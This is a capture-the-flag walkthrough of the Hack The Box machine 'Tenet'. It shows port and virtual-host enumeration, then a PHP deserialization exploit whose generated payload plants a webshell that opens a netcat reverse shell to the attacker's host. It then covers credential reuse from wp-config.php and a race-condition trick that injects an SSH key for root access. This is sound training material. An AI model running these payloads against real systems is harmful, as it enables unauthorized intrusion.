Nmap
Exploitation
Post exploitation
Privilege scalation to neil
Enumeration
Sudo
Privilege escalation to root
Welcome to the Tenet writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Tenet
tags: HTB
Medium
Linux
Platform: Hackthebox
Difficult: Medium
S.O.: Linux
Link: Click here
Enumeration
Nmap
kali@kali:/mnt/hgfs/2_MisPostsBlog/HTB/Tenet$ sudo nmap -sC -sV -p22,80 -n -oN PortsDepth.txt 10.129.54.208
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-16 16:03 EST
Nmap scan report for 10.129.54.208
Host is up (0.034s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA)
| 256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA)
|_ 256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.41 seconds
In port 80 we find the main page of the apache server, I am going to list the possible domains that may exist.
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -H "HOST: FUZZ.htb" -u http://10.129.54.216/ -mc 200 -fs 10918
Perfect, we have found the domain tenet.htb
and with it, we find a wordpress. In one of the posts there is a comment and there are two user neil
and protagonist
.
kali@kali:/mnt/hgfs/2_MisPostsBlog/HTB/Tenet$ gobuster dir -t 40 -u http://tenet.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://tenet.htb/
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html,txt
[+] Timeout: 10s
===============================================================
2021/01/16 16:24:20 Starting gobuster
===============================================================
/wp-content (Status: 301)
/index.php (Status: 301)
/wp-login.php (Status: 200)
/license.txt (Status: 200)
/wp-includes (Status: 301)
/readme.html (Status: 200)
/wp-trackback.php (Status: 200)
/wp-admin (Status: 301)
/wp-signup.php (Status: 302)
/server-status (Status: 403)
===============================================================
2021/01/16 16:38:47 Finished
===============================================================
Inside a blog comment they talk about a php file called sator and a backup but as much as I look for it inside the server I can't find it so, I'm going to look for it inside the ip.
I have created a dictionary with the words sator and backup and now fuzzing over the IP after trying the extensions .php
, .bak
and .php.bak
we found the file sator.php.bak
ffuf -w dict.txt -u http://10.129.54.216/FUZZ.php.bak -t 200
:: Method : GET
:: URL : http://10.129.54.216/FUZZ.php.bak
:: Wordlist : FUZZ: dict.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
sator [Status: 200, Size: 514, Words: 48, Lines: 32]
:: Progress: [1/2] :: Job [1/1] :: 1460 req/sec :: Duration: [0:00:01] :: Errors: 0 ::
The content of the file is as follows:
<?php
class DatabaseExport
{
public $user_file = 'users.txt';
public $data = '';
public function update_db()
{
echo '[+] Grabbing users from text file <br>';
$this-> data = 'Success';
}
public function __destruct()
{
file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
echo '[] Database updated <br>';
// echo 'Gotta get this working properly...';
}
}
$input = $_GET['arepo'] ?? '';
$databaseupdate = unserialize($input);
$app = new DatabaseExport;
$app -> update_db();
?>
Exploitation
As we can see, we can inject using the arepo
parameter which is processed by the unserialize()
function.
Using the following PHP code we can generate the serialized injection to obtain an RCE.
<?php
class DatabaseExport
{
public $user_file = 'cmd.php';
public $data = "<?php system('touch /tmp/f; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.x 4444 > /tmp/f '); ?>";
}
print urlencode(serialize(new DatabaseExport))."\n";
?>
kali@kali:$ php ExUnserialize.php
O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A7%3A%22cmd.php%22%3Bs%3A4%3A%22data%22%3Bs%3A119%3A%22%3C%3Fphp+system%28%27touch+%2Ftmp%2Ff%3B+rm+%2Ftmp%2Ff%3B+mkfifo+%2Ftmp%2Ff%3B+cat+%2Ftmp%2Ff+%7C+%2Fbin%2Fsh+-i+2%3E%261+%7C+nc+10.10.14.x+4444+%3E+%2Ftmp%2Ff+%27%29%3B+%3F%3E%22%3B%7D
Now you just have to put a terminal to listen and call the URL: http://10.129.54.216/cmd.php
Post exploitation
Privilege scalation to neil
To get the user flag we need to scale from www-data
to neil
. The first thing that comes to mind is the wordpress wp-config.php
file.
www-data@tenet:/var/www/html/wordpress$ cat wp-config.php
.........................................................
/** MySQL database username */
define( 'DB_USER', 'neil' );
/** MySQL database password */
define( 'DB_PASSWORD', 'Opera2112' );
.........................................................
We may have the password for user neil. Let's authenticate.
www-data@tenet:/var/www/html/wordpress$ su neil
Password: Opera2112
neil@tenet:/var/www/html/wordpress$
With this, we can now get the user flag.
Now we are going to list a bit to try to get root.
Enumeration
Sudo
neil@tenet:~$ sudo -l
Matching Defaults entries for neil on tenet:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:
User neil may run the following commands on tenet:
(ALL : ALL) NOPASSWD: /usr/local/bin/enableSSH.sh
neil@tenet:~$
Privilege escalation to root
We can run the enableSSH.sh
file as root using sudo.
We put our rsa key in a file called key.pub
.
Note: tmux has been used within the server to generate the 2 terminals. (Accessing with two different SSH accounts has NOT worked since each SSH session has a clean /tmp
directory)
Terminal1:$ while true; do sudo /usr/local/bin/enableSSH.sh; done >/dev/null
Terminal2:$ while true; do cat key.pub > $(ls ssh*);done 2>/dev/null
After a few seconds with Ctrl + c
we exit both loops.
Now all you have to do is ssh the machine as root and get its flag.